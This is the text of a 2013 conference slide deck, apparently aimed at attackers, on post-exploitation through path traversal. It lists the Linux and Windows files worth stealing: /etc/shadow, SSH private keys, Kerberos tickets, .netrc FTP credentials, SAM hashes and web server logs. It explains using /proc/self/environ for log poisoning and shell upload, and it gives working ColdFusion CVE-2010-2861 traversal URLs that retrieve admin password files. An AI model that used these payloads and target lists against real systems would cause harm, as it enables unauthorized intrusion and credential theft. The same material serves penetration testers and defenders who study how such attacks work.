Path traversal post exploitationBy George Lagoda

Nov 23, 2013

This slide intentionally left blank(always dreamed of it )

Common understanding of path traversal

A Path Traversal attack aims to access files and directories that are stored outside the web root folder.

(OWASP)

WHAT FILES AND DIRS OUTSIDE THE WEB ROOT DO WE NEED AND WHY?

/etc/passwd – why so special?

Y.O.B.A. hacking

NEXT STEPS1. /root/.bash_history

if not accessible try harder:

/home/username/.bash_history game me:

Looks like epic win??:

After analyzing prepare_release.sh:

.netrc file• Provides remember me for ftpWhat I had when checked /home/username/.netrc :

machine ftp.server.comlogin secret_usr

password secret_pwd

Help for shell uploading/proc/self/environ /proc/self/statusUseful if we wannafind access or error logs of Apache, document root of the server or we also have LFI and wanna exploit Apache log poisoning

Smtg fo crds• SSH keys, often passwordless:

/home/*/.ssh/id*• Kerberos tickets: /tmp/krb5cc_*,

/tmp/krb5.keytab• PGP keys: /home/*/.gnupg/secring.gpgs

What distro we have?• /etc/SUSE-release # Novell SUSE • /etc/redhat-release, /etc/redhat_version # Red Hat• /etc/fedora-release # Fedora• /etc/slackware-release, • /etc/slackware-version # Slackware• /etc/debian_release, /etc/debian_version # Debian• /etc/mandrake-release # Mandrake• /etc/sun-release # Sun JDS• /etc/release # Solaris/Sparc• /etc/gentoo-release # Gentoo• /etc/arch-release # Arch Linux (file

will be empty)• arch # OpenBSD;

sample: “OpenBSD.amd64”

What about windows?

File Expected Contents / Description

%SYSTEMDRIVE%\boot.ini A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening.

%WINDIR%\win.ini This is another file to look for if boot.ini isn’t there or coming back, which is sometimes the case.

%SYSTEMROOT%\repair\SAM

%SYSTEMROOT%\System32\config\RegBack\SAM

It stores users' passwords in a hashed format (in LM hash and NTLM hash). The SAM file in \repair is locked, but can be retired using forensic or Volume Shadow copy methods

%SYSTEMROOT%\repair\system%SYSTEMROOT%\System32\config\RegBack\system

%SYSTEMDRIVE%\autoexec.bat

%SYSTEMDRIVE%\pagefile.sys Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size

%WINDIR%\system32\logfiles\httperr\httperr1.log IIS 6 error log

%SystemDrive%\inetpub\logs\LogFiles IIS 7’s logs location

%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day)

%WINDIR%\system32\config\AppEvent.Evt

%WINDIR%\system32\config\SecEvent.Evt

%WINDIR%\system32\config\default.sav

%WINDIR%\system32\config\security.sav

%WINDIR%\system32\config\software.sav

%WINDIR%\system32\config\system.sav

%WINDIR%\system32\CCM\logs\*.log%USERPROFILE%\ntuser.dat

U really thought I will forget bout kittens?

• /etc/passwd• /etc/shadow (gotta try..)• /etc/shadow~ # (sometimes

there when edited withgedit)

• /etc/master.passwd• /etc/group• /etc/hosts• /etc/crontab• /etc/sysctl.conf

• /etc/resolv.conf• /etc/samba/smb.conf

• /etc/exports• /etc/auto.master• /etc/auto_maste• /etc/fstab• /etc/exports• /etc/sudoers

Some SW defaultshttp://wiki.apache.org/httpd/DistrosDefaultLayout

Also for cold fusion(not the last vers but still)

ColdFusion 6:http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00enColdFusion 7:http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00enColdFusion 8http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00enAll versions:

http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en

http://www.cvedetails.com/cve/CVE-2010-2861/

• In case if you still don’t have path traversal to post exploit it, may be this tool could be useful for you: http://dotdotpwn.blogspot.ru/

Why so serious?

Thank you for visiting us And

HACK YOU (the end).